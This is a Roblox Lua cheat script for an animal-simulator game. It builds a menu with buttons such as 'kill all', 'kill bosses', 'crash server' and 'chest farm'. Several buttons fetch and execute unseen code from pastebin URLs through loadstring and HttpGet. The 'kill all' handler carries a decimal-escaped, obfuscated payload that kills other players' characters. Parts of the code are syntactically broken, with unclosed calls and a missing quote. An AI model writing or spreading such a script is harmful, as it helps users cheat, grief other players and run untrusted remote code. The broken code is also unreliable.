-- DONT LEAK THIS OR YOUR BANNED FROM GETTING OUR SCRIPTS --
local ScreenGui = Instance.new("ScreenGui")
local Main = Instance.new("Frame")
local UICorner = Instance.new("UICorner")
local creepyimage = Instance.new("ImageLabel")
local ALLSKINS = Instance.new("TextButton")
local UICorner_2 = Instance.new("UICorner")
local OPXP = Instance.new("TextButton")
local UICorner_3 = Instance.new("UICorner")
local banplayer = Instance.new("TextButton")
local UICorner_4 = Instance.new("UICorner")
local chestfarm = Instance.new("TextButton")
local UICorner_5 = Instance.new("UICorner")
local crashserver = Instance.new("TextButton")
local UICorner_6 = Instance.new("UICorner")
local instakillsword = Instance.new("TextButton")
local UICorner_7 = Instance.new("UICorner")
local killall = Instance.new("TextButton")
local UICorner_8 = Instance.new("UICorner")
local killbosses = Instance.new("TextButton")
local UICorner_9 = Instance.new("UICorner")
local TextBox = Instance.new("TextBox")
local UICorner_10 = Instance.new("UICorner")

--Properties:

ScreenGui.Parent = game.CoreGui

Main.Name = "Main"
Main.Parent = ScreenGui
Main.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
Main.Position = UDim2.new(0.187292099, 0, 0.269643188, 0)
Main.Size = UDim2.new(0, 381, 0, 13)
Main.Active = true
Main.Draggable = true

UICorner.Parent = Main

creepyimage.Name = "creepyimage"
creepyimage.Parent = Main
creepyimage.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
creepyimage.BorderSizePixel = 0
creepyimage.Position = UDim2.new(0.0147184245, 0, 0.979725838, 0)
creepyimage.Size = UDim2.new(0, 369, 0, 189)
creepyimage.Image = "http://www.roblox.com/asset/?id=9470600839"

ALLSKINS.Name = "ALL SKINS"
ALLSKINS.Parent = Main
ALLSKINS.BackgroundColor3 = Color3.fromRGB(208, 0, 0)
ALLSKINS.Position = UDim2.new(0.0396762677, 0, 6.27329445, 0)
ALLSKINS.Size = UDim2.new(0, 76, 0, 50)
ALLSKINS.Font = Enum.Font.SourceSans
ALLSKINS.Text = "all skins"
ALLSKINS.TextColor3 = Color3.fromRGB(0, 0, 0)
ALLSKINS.TextSize = 14.000

UICorner_2.CornerRadius = UDim.new(1, 0)
UICorner_2.Parent = ALLSKINS

OPXP.Name = "OP XP"
OPXP.Parent = Main
OPXP.BackgroundColor3 = Color3.fromRGB(208, 0, 0)
OPXP.Position = UDim2.new(0.0423009172, 0, 1.53189492, 0)
OPXP.Size = UDim2.new(0, 76, 0, 50)
OPXP.Font = Enum.Font.SourceSans
OPXP.Text = "OP XP"
OPXP.TextColor3 = Color3.fromRGB(0, 0, 0)
OPXP.TextSize = 14.000
OPXP.MouseButton1Down:Connect(function()
	loadstring(game:HttpGet("https://pastebin.com/raw/acnub91d"))()
end)

UICorner_3.CornerRadius = UDim.new(1, 0)
UICorner_3.Parent = OPXP

banplayer.Name = "ban player"
banplayer.Parent = Main
banplayer.BackgroundColor3 = Color3.fromRGB(208, 0, 0)
banplayer.Position = UDim2.new(0.755814135, 0, 11.1624451, 0)
banplayer.Size = UDim2.new(0, 76, 0, 50)
banplayer.Font = Enum.Font.SourceSans
banplayer.Text = "ban *OP*"
banplayer.TextColor3 = Color3.fromRGB(0, 0, 0)
banplayer.TextSize = 14.000

UICorner_4.CornerRadius = UDim.new(1, 0)
UICorner_4.Parent = banplayer

chestfarm.Name = "chest farm"
chestfarm.Parent = Main
chestfarm.BackgroundColor3 = Color3.fromRGB(208, 0, 0)
chestfarm.Position = UDim2.new(0.25806731, 0, 1.53189492, 0)
chestfarm.Size = UDim2.new(0, 76, 0, 50)
chestfarm.Font = Enum.Font.SourceSans
chestfarm.Text = "chest farm"
chestfarm.TextColor3 = Color3.fromRGB(0, 0, 0)
chestfarm.TextSize = 14.000
chestfarm.MouseButton1Down:Connect(function()
	loadstring(game:HttpGet("https://pastebin.com/raw/f1pdUs4X"))(
end)

UICorner_5.CornerRadius = UDim.new(1, 0)
UICorner_5.Parent = chestfarm

crashserver.Name = "crash server"
crashserver.Parent = Main
crashserver.BackgroundColor3 = Color3.fromRGB(208, 0, 0)
crashserver.Position = UDim2.new(0.754130185, 0, 6.2732954, 0)
crashserver.Size = UDim2.new(0, 76, 0, 50)
crashserver.Font = Enum.Font.SourceSans
crashserver.Text = "crash server"
crashserver.TextColor3 = Color3.fromRGB(0, 0, 0)
crashserver.TextSize = 14.000

UICorner_6.CornerRadius = UDim.new(1, 0)
UICorner_6.Parent = crashserver

instakillsword.Name = "insta kill sword"
instakillsword.Parent = Main
instakillsword.BackgroundColor3 = Color3.fromRGB(208, 0, 0)
instakillsword.Position = UDim2.new(0.039676249, 0, 11.162446, 0)
instakillsword.Size = UDim2.new(0, 76, 0, 50)
instakillsword.Font = Enum.Font.SourceSans
instakillsword.Text = "insta-kill  sword"
instakillsword.TextColor3 = Color3.fromRGB(0, 0, 0)
instakillsword.TextSize = 14.000

UICorner_7.CornerRadius = UDim.new(1, 0)
UICorner_7.Parent = instakillsword

killall.Name = "kill all"
killall.Parent = Main
killall.BackgroundColor3 = Color3.fromRGB(208, 0, 0)
killall.Position = UDim2.new(0.75238204, 0, 1.53189468, 0)
killall.Size = UDim2.new(0, 76, 0, 50)
killall.Font = Enum.Font.SourceSans
killall.Text = "kill all"
killall.TextColor3 = Color3.fromRGB(0, 0, 0)
killall.TextSize = 14.000
killall.MouseButton1Down:Connect(function()
	loadstring(game:HttpGet(\108\111\99\97\108\32\76\80\32\61\32\103\97\109\101\58\71\101\116\83\101\114\118\105\99\101\40\34\80\108\97\121\101\114\115\34\41\46\76\111\99\97\108\80\108\97\121\101\114\10\119\104\105\108\101\32\119\97\105\116\40\48\46\49\41\32\100\111\10\102\111\114\32\105\44\118\32\105\110\32\112\97\105\114\115\40\103\97\109\101\58\71\101\116\83\101\114\118\105\99\101\40\34\80\108\97\121\101\114\115\34\41\58\71\101\116\80\108\97\121\101\114\115\40\41\41\32\100\111\10\105\102\32\118\32\97\110\100\32\118\46\67\104\97\114\97\99\116\101\114\32\97\110\100\32\118\32\126\61\32\76\80\32\97\110\100\32\118\46\67\104\97\114\97\99\116\101\114\58\70\105\110\100\70\105\114\115\116\67\104\105\108\100\40\34\72\101\97\100\34\41\32\116\104\101\110\10\108\111\99\97\108\32\104\114\112\32\61\32\118\46\67\104\97\114\97\99\116\101\114\58\70\105\110\100\70\105\114\115\116\67\104\105\108\100\40\34\72\101\97\100\34\41\32\10\104\114\112\58\66\114\101\97\107\74\111\105\110\116\115\40\41\10\104\114\112\46\84\114\97\110\115\112\97\114\101\110\99\121\32\61\32\48\10\104\114\112\46\66\114\105\99\107\67\111\108\111\114\32\61\32\118\46\84\101\97\109\67\111\108\111\114\10\104\114\112\46\65\110\99\104\111\114\101\100\32\61\32\116\114\117\101\10\104\114\112\46\67\97\110\67\111\108\108\105\100\101\32\61\32\102\97\108\115\101\10\112\99\97\108\108\40\102\117\110\99\116\105\111\110\40\41\10\104\114\112\46\67\70\114\97\109\101\32\61\32\76\80\46\67\104\97\114\97\99\116\101\114\46\72\117\109\97\110\111\105\100\82\111\111\116\80\97\114\116\46\67\70\114\97\109\101\32\42\32\67\70\114\97\109\101\46\110\101\119\40\49\44\48\44\45\51\46\53\41\10\101\110\100\41\10\101\110\100\10\101\110\100\10\101\110\100\10"))(
end)

UICorner_8.CornerRadius = UDim.new(1, 0)
UICorner_8.Parent = killall

killbosses.Name = "kill bosses"
killbosses.Parent = Main
killbosses.BackgroundColor3 = Color3.fromRGB(208, 0, 0)
killbosses.Position = UDim2.new(0.533376217, 0, 1.53189492, 0)
killbosses.Size = UDim2.new(0, 76, 0, 50)
killbosses.Font = Enum.Font.SourceSans
killbosses.Text = "kill bosses"
killbosses.TextColor3 = Color3.fromRGB(0, 0, 0)
killbosses.TextSize = 14.000
killbosses.MouseButton1Down:Connect(function()
	loadstring(game:HttpGet("https://pastebin.com/raw/XwRS2tnj"))(
end)
UICorner_9.CornerRadius = UDim.new(1, 0)
UICorner_9.Parent = killbosses

TextBox.Parent = Main
TextBox.BackgroundColor3 = Color3.fromRGB(170, 0, 0)
TextBox.BorderColor3 = Color3.fromRGB(170, 0, 0)
TextBox.BorderSizePixel = 0
TextBox.Position = UDim2.new(0.139705151, 0, 0.0309823845, 0)
TextBox.Size = UDim2.new(0, 274, 0, 11)
TextBox.Font = Enum.Font.SourceSans
TextBox.Text = "founđ's animal sim script"
TextBox.TextColor3 = Color3.fromRGB(0, 0, 0)
TextBox.TextSize = 14.000

UICorner_10.Parent = TextBox
